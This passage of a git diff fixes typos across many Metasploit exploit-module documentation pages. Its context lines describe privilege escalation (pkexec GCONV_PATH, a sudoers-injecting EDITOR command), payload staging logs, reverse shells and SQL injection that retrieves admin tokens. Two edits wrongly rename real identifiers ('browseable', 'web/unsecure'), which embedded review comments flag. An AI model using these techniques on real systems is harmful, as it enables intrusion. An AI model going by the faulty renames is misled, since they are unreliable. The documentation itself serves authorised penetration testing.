proper input validation. +of the file. Name of the for this operation is directly taken from user input and then used at inside of the command without proper input validation. **Vulnerable Application Installation Steps** 
@@ -72,9 +72,9 @@ msf exploit(securityonion_xplico_exec) > exploit [*] Authenticating with our activated new user [+] Successfully authenticated [*] Creating new case -[+] New Case successfully creted. Our pol_id = 36 +[+] New Case successfully created. Our pol_id = 36 [*] Creating new xplico session for pcap -[+] New Sols successfully creted. Our sol_id = 54 +[+] New Sols successfully created. Our sol_id = 54 [*] Uploading malformed PCAP file [+] PCAP successfully uploaded. Pcap parser is going to start on server side. [*] Parsing has started. Wait for parser to get the job done... diff --git a/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md b/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md index 1a17ee5b2e4f..09a1a66ea897 100644 --- a/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md +++ b/documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md @@ -169,7 +169,7 @@ We can do this by creating a folder in the `PATH` called `GCONV_PATH=.` and with file named `abc`. We also add the directory `GCONV_PATH` to the `PATH` environment variable. Now, when we launch pkexec without any arguments, but with `abc` as the first environment variable and `PATH=GCONV_PATH=` as the second, `g_find_program_in_path` will look for `abc` in the folder `GCONV_PATH=.` and find it. -It will then overwrite the first environment variable withe the full path to the file as it exists in +It will then overwrite the first environment variable with the full path to the file as it exists in our PATH: `GCONV_PATH=./abc` or exactly what we'd like to have as our environment variable. Now, if we can coerce pkexec to use an unknown charset, it will load the library `./abc.so` which we'll make the name of our payload. 
@@ -204,7 +204,7 @@ Once `g_find_program_in_path` runs, the environment variables will be changed to `CHARSET=garbage` -The result will be that pkexec errors while trying to encode test to the non-existant charset, causing it to +The result will be that pkexec errors while trying to encode test to the non-existent charset, causing it to load the provided abc.so file in the root context. ## Verification diff --git a/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md b/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md index 9478296bc675..0e0f49950d98 100644 --- a/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md +++ b/documentation/modules/exploit/linux/local/cve_2022_0995_watch_queue.md @@ -4,7 +4,7 @@ This module exploits a vulnerability in the Linux Kernel's watch_queue event notification system. It relies on a heap out-of-bounds write in kernel memory. The exploit may fail on the first attempt so multiple attempts may be needed. Note that the exploit can potentially cause a denial of service if multiple -failed attemps occur, however this is unlikely. +failed attempts occur, however this is unlikely. ### Install diff --git a/documentation/modules/exploit/linux/local/docker_runc_escape.md b/documentation/modules/exploit/linux/local/docker_runc_escape.md index f978b66066b9..68b82807749a 100644 --- a/documentation/modules/exploit/linux/local/docker_runc_escape.md +++ b/documentation/modules/exploit/linux/local/docker_runc_escape.md @@ -82,7 +82,7 @@ cp ### OVERWRITE -The shell that is going to be overwriten with `#!/proc/self/exe`. This will be +The shell that is going to be overwritten with `#!/proc/self/exe`. This will be triggered by a user running `docker exec -ti `. Default is `/bin/sh`. diff --git a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md index cc72b7d17b39..9fab3b0792df 100644 
--- a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md +++ b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md @@ -29,7 +29,7 @@ The following installation instructions are for Ubuntu 14.04.1 LTS ("trusty"). ```sh - # List avilable juju packages + # List available juju packages apt-cache showpkg juju # Install a vulnerable package diff --git a/documentation/modules/exploit/linux/local/service_persistence.md b/documentation/modules/exploit/linux/local/service_persistence.md index 3aafbe72bf14..f1406537ada9 100644 --- a/documentation/modules/exploit/linux/local/service_persistence.md +++ b/documentation/modules/exploit/linux/local/service_persistence.md @@ -184,7 +184,7 @@ Now with a multi handler, we can catch Upstart restarting the process every 10se ### systemd (Ubuntu 16.04 Server - root) Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works. -While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode. +While python shellcode works on previous systems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode. Get initial access diff --git a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md index 8923bd056914..e30129861775 100644 --- a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md +++ b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md 
@@ -142,7 +142,7 @@ resource (sudoedit.rb)> exploit [*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf [*] Adding user to sudoers [*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # SbccIOwAiK1i' -- /etc/sudoers" sudo -S -e /etc/motd -[+] Likely successful exploitation, detected possitive error message: editing files in a writable directory is not permitted +[+] Likely successful exploitation, detected positive error message: editing files in a writable directory is not permitted [*] sudo: --: editing files in a writable directory is not permitted [*] Spawning payload [*] Transmitting intermediate stager...(126 bytes) diff --git a/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md b/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md index c2f6ecbfa5fc..bd489a07abba 100644 --- a/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md +++ b/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md @@ -1,8 +1,8 @@ ## Vulnerable Application -This module exploits a buffer-overflow in multiple Zyxel devices. The vulnerabilitiy stems from missing string length +This module exploits a buffer-overflow in multiple Zyxel devices. The vulnerability stems from missing string length checks. The vulnerability can only be exploited from the LAN side, but does not require authentication. As ASLR is -activated, the libc address will be bruteforced. Thus the webserver will crash until successfull exploitation. On +activated, the libc address will be bruteforced. Thus the webserver will crash until successful exploitation. On average this process takes 20 minutes. This vulnerability was discovered by Steffen Robertz, Gerhard Hechenberger, Stefan Viehboeck and Thomas Weber of the SEC 
diff --git a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md index bd622c86f4e2..8bd20a399ef3 100644 --- a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md +++ b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md @@ -30,7 +30,7 @@ compile it to a redis module file during running, which is more undetectable. It's only worked on linux system. For other scenarios, such as lack of gcc, or others opreate systems, framework -could not compile the source for sucessful exploit, it uses the +could not compile the source for successful exploit, it uses the pre-compiled redis module to accomplish this exploit. ## Scenarios diff --git a/documentation/modules/exploit/linux/samba/is_known_pipename.md b/documentation/modules/exploit/linux/samba/is_known_pipename.md index 0757631b876e..4ef19bfe5258 100644 --- a/documentation/modules/exploit/linux/samba/is_known_pipename.md +++ b/documentation/modules/exploit/linux/samba/is_known_pipename.md @@ -18,7 +18,7 @@ where no SMB options are required to be set: comment = CVE-2017-7494 path = /tmp writable = yes -browseable = yes +browsable = yes guest ok = yes ``` diff --git a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md index 477e7f57c2d7..e136b923a587 100644 --- a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md +++ b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md @@ -71,7 +71,7 @@ [*] 192.168.1.1:445 - Calling the vulnerable function... [*] 192.168.1.1:445 - Server did not respond, this is expected - ...Some intermediate attempts ommitted... + ...Some intermediate attempts omitted... [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55996000... [*] 192.168.1.1:445 - Connecting to the SMB service... 
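Review bot: In the is_known_pipename.md hunk the `browseable = yes` → `browsable = yes` change rewrites a smb.conf configuration key, not prose: `browseable` is the canonical parameter spelling in smb.conf(5), and `browsable` is documented there only as an accepted synonym. Users copying this share definition will compare it against Samba's own documentation and other examples, all of which use `browseable`, so the "fix" reads as the typo. I would revert that single line to `browseable = yes`; if the alternate spelling is kept, a short note that Samba accepts both would avoid confusion.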
diff --git a/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md b/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md index 84a84f8be783..4be4d90e3140 100644 --- a/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md +++ b/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md @@ -20,7 +20,7 @@ Compatible Payloads Name Disclosure Date Rank Description ---- --------------- ---- ----------- - cmd/mainframe/apf_privesc_jcl normal JCL to escalate privilages via APF LIB + cmd/mainframe/apf_privesc_jcl normal JCL to escalate privileges via APF LIB cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP diff --git a/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md b/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md index eea6baf80c1a..6add9e294bf2 100644 --- a/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md +++ b/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md @@ -46,7 +46,7 @@ msf6 exploit(multi/http/apache_flink_jar_upload_exec) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. Apache Flink version 1.9.3. [*] Uploading JAR payload 'bxAGPHOcppvL.jar' (5309 bytes) ... -[*] Retrieving list of avialable JAR files ... +[*] Retrieving list of available JAR files ... [+] Found uploaded JAR file 'b4222291-a682-4788-9d43-44ebe5b18426_bxAGPHOcppvL.jar' [*] Executing JAR payload 'b4222291-a682-4788-9d43-44ebe5b18426_bxAGPHOcppvL.jar' entry class 'metasploit.Payload' ... [*] Sending stage (58147 bytes) to 172.16.191.194 
@@ -79,7 +79,7 @@ msf6 exploit(multi/http/apache_flink_jar_upload_exec) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. Apache Flink version 1.11.2. [*] Uploading JAR payload 'JhnJgOxev.jar' (5309 bytes) ... -[*] Retrieving list of avialable JAR files ... +[*] Retrieving list of available JAR files ... [+] Found uploaded JAR file '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar' [*] Executing JAR payload '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar' entry class 'metasploit.Payload' ... [*] Sending stage (58147 bytes) to 172.16.191.193 diff --git a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md index 1bd67565e517..4bb282125b6c 100644 --- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md +++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md @@ -26,7 +26,7 @@ If authentication and authorisation is enabled, the account used must have the f execution using this module: * Permission to "view" and "modify" the root controller. -* Permmission to "access restricted components", "regardless of restrictions". +* Permission to "access restricted components", "regardless of restrictions". If authentication is required, then the `USERNAME` and `PASSWORD` options can be used to specify credentials. Alternatively, if a more complex authentication flow is required (such as OpenId Connect), or a session token has already been obtained, a session token in the form diff --git a/documentation/modules/exploit/multi/http/cockpit_cms_rce.md b/documentation/modules/exploit/multi/http/cockpit_cms_rce.md index 3f3c7afb7346..146d48704747 100644 --- a/documentation/modules/exploit/multi/http/cockpit_cms_rce.md +++ b/documentation/modules/exploit/multi/http/cockpit_cms_rce.md 
@@ -1,7 +1,7 @@ ## Vulnerable Application This module exploits two NoSQLi vulnerabilities to retrieve the user list, -and password reset tokens from the system. Next, the USER is targetted to +and password reset tokens from the system. Next, the USER is targeted to reset their password. Then a command injection vulnerability is used to execute the payload. diff --git a/documentation/modules/exploit/multi/http/horde_form_file_upload.md b/documentation/modules/exploit/multi/http/horde_form_file_upload.md index 1d366dca0dae..2b7422ac10a9 100644 --- a/documentation/modules/exploit/multi/http/horde_form_file_upload.md +++ b/documentation/modules/exploit/multi/http/horde_form_file_upload.md @@ -6,7 +6,7 @@ The Horde subcomponent Horde Form < 2.0.19 is affected. This module was specific ### Docker install on Ubuntu 18.04 -Please folow these steps to setup a vulnerable version of Horde in Docker on a Ubuntu. +Please follow these steps to setup a vulnerable version of Horde in Docker on a Ubuntu. 1. Set up a [Ubuntu](http://www.ubuntu.com/) 18.04 box. 2. Open a terminal, and enter: ```sudo apt-get install docker.io```. Make sure Docker is properly configured and your current user has permession to use it. diff --git a/documentation/modules/exploit/multi/http/magento_unserialize.md b/documentation/modules/exploit/multi/http/magento_unserialize.md index 43ad2331c2f9..572e263f1a52 100644 --- a/documentation/modules/exploit/multi/http/magento_unserialize.md +++ b/documentation/modules/exploit/multi/http/magento_unserialize.md 
@@ -68,7 +68,7 @@ If at some point the IP (base URL) of Magento has changed, then you will need to 1. From the terminal, do: ```mysql -h localhost -u [username] -p[password]``` 2. In the SQL prompt, do: ```use [magento database name]``` -3. Do: ```select * from core_config_data;```, you should see both web/unsecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP. +3. Do: ```select * from core_config_data;```, you should see both web/insecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP. 4. Do: ```update core_config_data set value='http://[IP]/' where config_id=2;``` 5. Do: ```update core_config_data set value='https://[IP]/' where config_id=3;``` 6. Back to the Magento directory, do: ```sudo rm -rf var/cache/*``` diff --git a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md index 8dff6df06f39..0345eec78da8 100644 --- a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md +++ b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md @@ -84,7 +84,7 @@ LHOST => 10.10.10.2 msf exploit(makoserver_cmd_exec) > check [*] Trying to detect running Mako Server and necessary files... -[*] Mako Server save.lsp returns correct ouput. +[*] Mako Server save.lsp returns correct output. [*] 10.10.10.3:80 The target appears to be vulnerable. msf exploit(makoserver_cmd_exec) > exploit diff --git a/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md b/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md index 05baa98f1dcb..2704ec534b41 100644 --- a/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md +++ b/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md 
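Review bot: In the magento_unserialize.md hunk, `web/unsecure/base_url` is the literal config path stored in Magento's `core_config_data` table, so changing it to `web/insecure/base_url` replaces a correct identifier with one that does not exist in that table. The following `update ... where config_id=2` steps still work because they key on the ID, but a reader checking the `select` output for the renamed path will not find it. Revert this line to `web/unsecure/base_url (config ID 2)`; the spelling is Magento's, not a typo.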
@@ -49,7 +49,7 @@ msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > run [*] Started reverse TCP handler on 10.0.0.1:4444 [*] 10.0.0.100:8443 - Attacking Windows target -[+] 10.0.0.100:8443 - Succesfully authenticated and obtained our cookie! +[+] 10.0.0.100:8443 - Successfully authenticated and obtained our cookie! [*] 10.0.0.100:8443 - Sending payload to /services/DataAcquisitionService [+] 10.0.0.100:8443 - Success, shell incoming! [*] Sending stage (175174 bytes) to 10.0.0.100 diff --git a/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md b/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md index 11f1ae6e1a77..c5be6abf683d 100644 --- a/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md +++ b/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md @@ -26,7 +26,7 @@ Moodle provides a step by step guide to install their software ## Options -### Passowrd +### Password Password of an administrator. diff --git a/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md b/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md index 7453fd241edc..432907441046 100644 --- a/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md +++ b/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md @@ -16,7 +16,7 @@ This module was tested against Moodle version 3.9 ### Install Moodle provides a step by step guide to install their software. However you'll want to use -`3.9.0` isntead of `3.11.0`. +`3.9.0` instead of `3.11.0`. [here](https://docs.moodle.org/311/en/Step-by-step_Installation_Guide_for_Ubuntu) ## Verification Steps @@ -35,7 +35,7 @@ Moodle provides a step by step guide to install their software. However you'll The amount of users to add to the class in hopes of finding a manager. Defaults to `100`. -### Passowrd +### Password Password of a teacher. 
diff --git a/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md b/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md index 2f86ecc74012..3490f38a1155 100644 --- a/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md +++ b/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md @@ -10,7 +10,7 @@ products that are built on top of the OpManager application. This vulnerability #### CVE-2020-28653 This vulnerability affects OpManager versions 12.1 - 12.5.232. The vulnerability involves sending a malicious PDU to the -SmartUpdateManager handler that when deserialized executes an arbitary OS command. +SmartUpdateManager handler that when deserialized executes an arbitrary OS command. #### CVE-2021-3287 This vulnerability is a patch bypass for CVE-2020-28653 and affects OpManager versions 12.5.233 - 12.5.328. When the diff --git a/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md b/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md index 6b0461d0d2f7..add3702dfc3b 100644 --- a/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md +++ b/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md @@ -6,7 +6,7 @@ to the sendmail binary. This module writes a payload to the web root of the webs HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes. -[5.1.18](https://github.com/PHPMailer/PHPMailer/archive/v5.2.18.tar.gz) is also targetted. +[5.1.18](https://github.com/PHPMailer/PHPMailer/archive/v5.2.18.tar.gz) is also targeted. ## Verification Steps diff --git a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md index c1a563c1cad5..b44811fe54bf 100644 --- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md 
+++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md @@ -35,7 +35,7 @@ The module has been tested against qdPM version 9.1 As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected. - **Attacking with a generic PHP payload, OS independed** + **Attacking with a generic PHP payload, OS independent** ``` [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload) diff --git a/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md b/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md index e1a515e3d586..8806ea2eb14b 100644 --- a/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md +++ b/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md @@ -12,7 +12,7 @@ but it should be roughly the following steps: * The default creds are admin/password, but at some point you'll need to log in with your mysonicwall.com account * Eventually you'll be asked the install a license * Go back to https://www.mysonicwall.com -* On the left hand side menu go to "Product Mangement" -> "Trial Software" +* On the left hand side menu go to "Product Management" -> "Trial Software" * Scroll down to "GMS" click on "Try Now" * Enter a "Friendly name" - this can be anything - click on "Try Now" * You should see a success message diff --git a/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md b/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md index 70b74a610052..0a4aaf3f20da 100644 --- a/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md 
@@ -3,7 +3,7 @@ The Apache Struts framework, when forced, performs double evaluation of attribut attributes such as `id`. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). -This vulnerability is application dependant. A server side template must make an affected use of request data to +This vulnerability is application dependent. A server side template must make an affected use of request data to render an HTML tag attribute. Vulnerable versions of Apache Struts for both CVEs are provided by [vulhub][1] on GitHub. The setup instructions are identical diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md index db7af1adde68..8606b274a544 100644 --- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md @@ -15,7 +15,7 @@ This module is VERY similar to `exploit/multi/http/tomcat_mgr_upload`, the main 1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe) -The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax. +The install was default, other than adding a user during install. No other options were changed. The install assigned the new user the role `manager-gui`, which is Tomcat 7+ syntax. For this exploitation, it was changed to simply `manager`. #### Exploitation diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md b/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md index d7abcd7bd675..090f42e46a06 100644 
--- a/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md @@ -104,7 +104,7 @@ meterpreter > 1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe) -The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax. +The install was default, other than adding a user during install. No other options were changed. The install assigned the new user the role `manager-gui`, which is Tomcat 7+ syntax. For this exploitation, it was changed to simply `manager`. #### Exploitation diff --git a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md index 87f409bce99c..5b39ecf7fb30 100644 --- a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md +++ b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md 
@@ -123,10 +123,10 @@ msf5 exploit(multi/http/vbulletin_getindexablecontent) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. [*] Brute forcing to find a valid node id. -[+] Sucessfully found node at id 1 +[+] Successfully found node at id 1 [*] Attempting to determine the vBulletin table prefix. [*] Performing SQL injection on target to retrieve 'table_name' from 'information_schema.columns'. -[+] Sucessfully retrieved table to get prefix from vb5_language. +[+] Successfully retrieved table to get prefix from vb5_language. [*] Performing SQL injection on target to retrieve 'userid' from 'vb5_administrator'. [*] Performing SQL injection on target to retrieve 'username' from 'vb5_user'. [*] Performing SQL injection on target to retrieve 'token' from 'vb5_user'. @@ -154,7 +154,7 @@ msf5 exploit(multi/http/vbulletin_getindexablecontent) > run [*] Making request to '/vb5/ajax/api/widget/saveAdminConfig' to add payload to widget. [+] Successfully added payload to widget. [*] Sending request to '/vb5/admin/savepage' to save new page at 'OToB9nTU'. -[+] Page succesfully create and should be accessible at '/vb5/OToB9nTU'. +[+] Page successfully create and should be accessible at '/vb5/OToB9nTU'. [+] Executing PHP payload (230 bytes) at /vb5/OToB9nTU. [*] Sending request to '/vb5/OToB9nTU' to execute payload. [*] Sending delete page request to '/vb5/ajax/api/page/delete'. diff --git a/documentation/modules/exploit/multi/http/zabbix_script_exec.md b/documentation/modules/exploit/multi/http/zabbix_script_exec.md index f3997a9cf9ea..f1fdd7a0965e 100644 --- a/documentation/modules/exploit/multi/http/zabbix_script_exec.md +++ b/documentation/modules/exploit/multi/http/zabbix_script_exec.md 
@@ -7,7 +7,7 @@ Zabbix server allow remote command execution by two different way. The first way happen with the directive `AllowKey=system.run[*]` [[1]](https://blog.zabbix.com/zabbix-remote-commands/7500/#system.run). This directive is disabled by default, if an attacker already know Zabbix credentials -and the directive is enabled, he can abuse this functionnality to take control over the Zabbix server. +and the directive is enabled, he can abuse this functionality to take control over the Zabbix server. The second way is by creating a script [[2]](https://www.zabbix.com/documentation/devel/en/manual/web_interface/frontend_sections/administration/scripts) @@ -47,7 +47,7 @@ the directive `AllowKey=system.run[*]` is enabled in the `zabbix-agentd.conf` fi Communication between an agent and the server can be encrypted with TLS using a PSK (pre-shared key). If the server is configured to enforce that, you have to get the key from the web interface (browse inside a host -and navigate to `Encryption` tab) and specifiy it with this option, otherwise RCE is not gonna happen. +and navigate to `Encryption` tab) and specify it with this option, otherwise RCE is not gonna happen. ### TLS_PSK_IDENTITY @@ -68,7 +68,7 @@ msf6 exploit(multi/http/zabbix_script_exec) > set LHOST eth0 LHOST => 192.168.0.129 msf6 exploit(multi/http/zabbix_script_exec) > run [*] Started reverse TCP handler on 192.168.0.129:4444 -[+] Sucessfully logged in +[+] Successfully logged in [*] Getting a valid group id... [*] Creating a host called kTsSUTGmgKCwcsbMjZ [*] Using URL: http://0.0.0.0:8081/4J54NLVPQsj diff --git a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md index 5b4e1a3b4e9a..2dd9fd8d0a01 100644 --- a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md +++ b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md 
@@ -1,6 +1,6 @@ ## Vulnerable Application -This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder. +This vulnerability exploits mysql by adding a .so or .dll file which has a system call in it to the plugins folder. The Windows dll files are provided by [@stamparm](https://github.com/stamparm) of the sqlmap project and are located [here](https://github.com/rapid7/metasploit-framework/files/1879611/mysql_udf_libs.zip). As noted in [#9677](https://github.com/rapid7/metasploit-framework/issues/9677#issuecomment-378893925) these are 'de-cloaked' versions, diff --git a/documentation/modules/exploit/multi/php/jorani_path_trav.md b/documentation/modules/exploit/multi/php/jorani_path_trav.md index 9ce0265c3299..027b5afcf71c 100644 --- a/documentation/modules/exploit/multi/php/jorani_path_trav.md +++ b/documentation/modules/exploit/multi/php/jorani_path_trav.md @@ -16,7 +16,7 @@ So the scripts will not stop after the redirection because an exit statement is Because of this, the attacker can make the script continue and reach the LFI vulnerability without being authenticated. -So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application. +So by chaining these 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application. This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75. diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md index d34331228f34..2d22e8cf1bc6 100644 --- a/documentation/modules/exploit/multi/script/web_delivery.md +++ b/documentation/modules/exploit/multi/script/web_delivery.md 
@@ -129,7 +129,7 @@ These instructions will create a cgi environment and a vulnerable perl applicati #### Setup -In this example, we make a `post` form that pings a user provided IP, which is a typical funtion on many routers and is often abused a similar manner. +In this example, we make a `post` form that pings a user provided IP, which is a typical function on many routers and is often abused a similar manner. 1. Enable cgi: `a2enmod cgid` 2. `mkdir /var/www/cgi-bin` diff --git a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md index 579262f8755e..f631f6d90186 100644 --- a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md +++ b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md @@ -2,7 +2,7 @@ This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers from a command injection vulnerability that can be exploited by creating a specially crafted disk label. -The tmdiagnose binary uses awk to list every mounted volume, and composes shell commands based on the volume labels. By creating a volume label with the backtick character, we can have our own binary executed with root priviledges. +The tmdiagnose binary uses awk to list every mounted volume, and composes shell commands based on the volume labels. By creating a volume label with the backtick character, we can have our own binary executed with root privileges. ## Verification Steps diff --git a/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md b/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md index c79c853950ae..fff17865819e 100644 --- a/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md +++ b/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md 
@@ -1,6 +1,6 @@ ## Vulnerable Application -This module exploits an authenticated command injection vulnerabilty in the `restore_rrddata()` function of +This module exploits an authenticated command injection vulnerability in the `restore_rrddata()` function of pfSense prior to 2.7.0 which allows an authenticated attacker with the `WebCfg - Diagnostics: Backup & Restore` privilege to execute arbitrary operating system commands as the `root` user. diff --git a/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md b/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md index a673108e3247..b864a5403687 100644 --- a/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md +++ b/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md @@ -34,7 +34,7 @@ LHOST => 1.1.1.1 msf exploit(unix/http/pfsense_graph_injection_exec) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 -[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload +[*] Detected pfSense 2.2.6-RELEASE, uploading initial payload [*] Payload uploaded successfully, executing [*] Sending stage (37543 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600 @@ -61,7 